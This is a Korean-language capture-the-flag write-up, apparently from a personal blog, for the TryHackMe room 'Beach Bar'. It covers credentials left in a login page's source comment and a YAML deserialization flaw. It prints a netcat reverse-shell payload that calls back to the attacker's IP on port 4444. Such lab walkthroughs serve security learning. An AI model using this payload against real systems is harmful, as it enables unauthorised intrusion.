반응형
Beach Bar 문제 소개
소스코드 내 중요정보 노출되어, 노출된 계정으로 비인가자가 로그인 후 웹 서비스 취약점을 통한 시스템 내부 침투 후 권한 상승 공격하는 문제

Beach Bar (Write-UP)
“객실 접근 권한” 항목을 보면 웹 서비스 접근하여 문제를 풀어야 하는 것을 확인

웹 서비스 접근 후 로그인 페이지 소스코드 분석 시 계정 정보(jd/jd)가 주석으로 처리되어 있는 것을 확인

노출된 계정으로 로그인 가능한 것을 확인

업로드 메뉴 접근 후 문자열 기입 시 해당 문자열 그대로 노출되는 것을 확인

파이썬 코드를 통해 시스템 내부 명령어 실행 시 특정 문자열이 출력되지 않고, 특정 데이터 크기 값으로 추정되는 데이터가 노출되는 것을 확인

Netcat 도구를 통해 4444번 포트로 수신되는 데이터 대기 후 입력란에 파이썬 코드를 통해 접근 시도
- 명령어: !!python/object/apply:os.system ["nc [VPN IP] 4444 -e /bin/sh"]

시스템 내부에 침투 후 user.txt 파일 열람 가능한 것을 확인

반응형
'WarGame > TryHackMe' 카테고리의 다른 글
| [TryHackMe] Overheard at Breakfast (write-up) (0) | 2026.09.28 |
|---|---|
| [TryHackMe] Attacktive Directory (write-up) (0) | 2025.10.09 |
| [TryHackMe] TryHackMe OpenVPN 설정 가이드 (4) | 2024.10.24 |
| [TryHackMe][Agent T] (write up) (0) | 2024.07.31 |
| [TryHackMe][Blue] (writeup) (2) | 2024.06.20 |